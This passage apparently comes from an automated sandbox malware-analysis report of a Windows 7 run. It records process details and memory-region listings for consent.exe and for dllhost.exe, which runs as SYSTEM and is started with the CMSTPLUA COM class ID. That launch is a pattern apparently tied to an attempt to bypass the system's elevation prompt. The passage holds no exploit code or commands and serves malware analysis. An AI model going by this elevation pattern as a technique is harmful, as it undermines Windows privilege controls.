lpNumberOfCharsWritten=0x2bfc74*=0x33) returned 1 [0106.889] LocalFree (hMem=0x4f1d18) returned 0x0 [0106.889] LocalFree (hMem=0x0) returned 0x0 [0106.889] CloseServiceHandle (hSCObject=0x4efa10) returned 1 [0106.894] exit (_Code=5) Thread: id = 114 os_tid = 0x584 Process: id = "12" image_name = "consent.exe" filename = "c:\\windows\\system32\\consent.exe" page_root = "0x3f612000" os_pid = "0x8dc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x368" cmd_line = "consent.exe 872 342 00000000039616B0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1891 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1892 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1893 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1894 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1895 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1896 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1897 start_va = 0xffde0000 end_va = 0xffdfdfff entry_point = 0xffde0000 region_type = mapped_file name = "consent.exe" filename = "\\Windows\\System32\\consent.exe" (normalized: "c:\\windows\\system32\\consent.exe") Region: id = 1898 start_va = 0x7feff900000 end_va = 0x7feff900fff entry_point = 0x7feff900000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1899 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1900 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1901 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 1902 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1903 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1904 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1905 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1906 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1907 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1908 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1909 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0xd0000 region_type = mapped_file name = "consent.exe.mui" filename = "\\Windows\\System32\\en-US\\consent.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\consent.exe.mui") Region: id = 1910 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 1911 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1912 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1913 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1914 start_va = 0x430000 end_va = 0x5b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 1915 start_va = 0x5c0000 end_va = 0x740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1916 start_va = 0x750000 end_va = 0x1b4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 1917 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1918 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1919 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1920 start_va = 0x7fef6850000 end_va = 0x7fef688afff entry_point = 0x7fef6850000 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 1921 start_va = 0x7fef79c0000 end_va = 0x7fef79c6fff entry_point = 0x7fef79c0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 1922 start_va = 0x7fef87d0000 end_va = 0x7fef880cfff entry_point = 0x7fef87d0000 region_type = mapped_file name = "msutb.dll" filename = "\\Windows\\System32\\msutb.dll" (normalized: "c:\\windows\\system32\\msutb.dll") Region: id = 1923 start_va = 0x7fef8810000 end_va = 0x7fef881afff entry_point = 0x7fef8810000 region_type = mapped_file name = "msctfmonitor.dll" filename = "\\Windows\\System32\\MsCtfMonitor.dll" (normalized: "c:\\windows\\system32\\msctfmonitor.dll") Region: id = 1924 start_va = 0x7fefb880000 end_va = 0x7fefb890fff entry_point = 0x7fefb880000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1925 start_va = 0x7fefc030000 end_va = 0x7fefc223fff entry_point = 0x7fefc030000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1926 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1927 start_va = 0x7fefcf70000 end_va = 0x7fefcf77fff entry_point = 0x7fefcf70000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 1928 start_va = 0x7fefd4d0000 end_va = 0x7fefd50cfff entry_point = 0x7fefd4d0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1929 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1930 start_va = 0x7fefd5d0000 end_va = 0x7fefd5defff entry_point = 0x7fefd5d0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1931 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1932 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1933 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1934 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1935 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1936 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1937 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1938 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1939 start_va = 0x7fefee70000 end_va = 0x7feff072fff entry_point = 0x7fefee70000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1940 start_va = 0x7feff2e0000 end_va = 0x7feff37efff entry_point = 0x7feff2e0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1941 start_va = 0x7feff540000 end_va = 0x7feff5a6fff entry_point = 0x7feff540000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1942 start_va = 0x7feff830000 end_va = 0x7feff84efff entry_point = 0x7feff830000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1943 start_va = 0x110000 end_va = 0x111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 1944 start_va = 0x1b0000 end_va = 0x1dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1945 start_va = 0x1b50000 end_va = 0x1bcffff entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 1946 start_va = 0x1bd0000 end_va = 0x1caefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001bd0000" filename = "" Region: id = 1947 start_va = 0x1d90000 end_va = 0x1e0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 1948 start_va = 0x7fefbe50000 end_va = 0x7fefbea5fff entry_point = 0x7fefbe50000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1949 start_va = 0x7fefd3c0000 end_va = 0x7fefd3cafff entry_point = 0x7fefd3c0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1950 start_va = 0x7fefd3f0000 end_va = 0x7fefd414fff entry_point = 0x7fefd3f0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1951 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1952 start_va = 0x7fefd680000 end_va = 0x7fefd6b9fff entry_point = 0x7fefd680000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1953 start_va = 0x7fefde50000 end_va = 0x7fefebd7fff entry_point = 0x7fefde50000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1954 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1955 start_va = 0x1cb0000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cb0000" filename = "" Region: id = 1956 start_va = 0x1f20000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 1957 start_va = 0x1fa0000 end_va = 0x226efff entry_point = 0x1fa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1958 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1959 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1960 start_va = 0x7fefd950000 end_va = 0x7fefd966fff entry_point = 0x7fefd950000 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1961 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1962 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1963 start_va = 0x1e10000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 1964 start_va = 0x2330000 end_va = 0x23affff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 1965 start_va = 0x2450000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1966 start_va = 0x24d0000 end_va = 0x28c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 1967 start_va = 0x28d0000 end_va = 0x2c53fff entry_point = 0x28d0000 region_type = mapped_file name = "nt5.cat" filename = "\\Windows\\System32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\nt5.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\nt5.cat") Region: id = 1968 start_va = 0x2c60000 end_va = 0x2e5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 1969 start_va = 0x7fee3450000 end_va = 0x7fee3475fff entry_point = 0x7fee3450000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 1970 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1971 start_va = 0x7fefca60000 end_va = 0x7fefcaabfff entry_point = 0x7fefca60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1972 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1973 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1974 start_va = 0x7feff4e0000 end_va = 0x7feff531fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1975 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1976 start_va = 0x100000 end_va = 0x100fff entry_point = 0x100000 region_type = mapped_file name = "cmstplua.dll.mui" filename = "\\Windows\\System32\\en-US\\cmstplua.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cmstplua.dll.mui") Region: id = 1977 start_va = 0x7fefc6f0000 end_va = 0x7fefc6fbfff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Thread: id = 123 os_tid = 0x8ec Thread: id = 125 os_tid = 0x6ec Thread: id = 127 os_tid = 0x6d8 Thread: id = 128 os_tid = 0x940 Thread: id = 130 os_tid = 0x97c Thread: id = 131 os_tid = 0x9f8 Process: id = "13" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x418a2000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60b60080" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x368" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xe], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xe], "NT AUTHORITY\\Logon Session 00000000:000073c6" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1996 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1997 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1998 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1999 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2000 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 2001 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 2002 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2003 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2004 start_va = 0x260000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2005 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2006 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2007 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 2008 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 2009 start_va = 0x7e0000 end_va = 0x89ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 2010 start_va = 0x8e0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 2011 start_va = 0xaa0000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 2012 start_va = 0xba0000 end_va = 0xe6efff entry_point = 0xba0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2013 start_va = 0xe70000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 2014 start_va = 0x1010000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 2015 start_va = 0x1110000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2016 start_va = 0x12a0000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 2017 start_va = 0x12b0000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 2018 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2019 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2020 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2021 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2022 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2023 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2024 start_va = 0xff100000 end_va = 0xff106fff entry_point = 0xff100000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 2025 start_va = 0x7fee3370000 end_va = 0x7fee340ffff entry_point = 0x7fee3370000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 2026 start_va = 0x7fefc000000 end_va = 0x7fefc023fff entry_point = 0x7fefc000000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2027 start_va = 0x7fefc8d0000 end_va = 0x7fefc8edfff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2028 start_va = 0x7fefcb20000 end_va = 0x7fefcb66fff entry_point = 0x7fefcb20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2029 start_va = 0x7fefce20000 end_va = 0x7fefce36fff entry_point = 0x7fefce20000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2030 start_va = 0x7fefd420000 end_va = 0x7fefd42efff entry_point = 0x7fefd420000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2031 start_va = 0x7fefd510000 end_va = 0x7fefd523fff entry_point = 0x7fefd510000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2032 start_va = 0x7fefd530000 end_va = 0x7fefd53efff entry_point = 0x7fefd530000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2033 start_va = 0x7fefd6e0000 end_va = 0x7fefd74afff entry_point = 0x7fefd6e0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2034 start_va = 0x7fefd970000 end_va = 0x7fefda78fff entry_point = 0x7fefd970000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2035 start_va = 0x7fefda80000 end_va = 0x7fefdbacfff entry_point = 0x7fefda80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2036 start_va = 0x7fefdce0000 end_va = 0x7fefdcedfff entry_point = 0x7fefdce0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2037 start_va = 0x7fefdcf0000 end_va = 0x7fefdd60fff entry_point = 0x7fefdcf0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2038 start_va = 0x7fefdd70000 end_va = 0x7fefde38fff entry_point = 0x7fefdd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2039 start_va = 0x7fefebe0000 end_va = 0x7fefec0dfff entry_point = 0x7fefebe0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2040 start_va = 0x7fefed90000 end_va = 0x7fefee6afff entry_point = 0x7fefed90000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2041 start_va = 0x7fefee70000 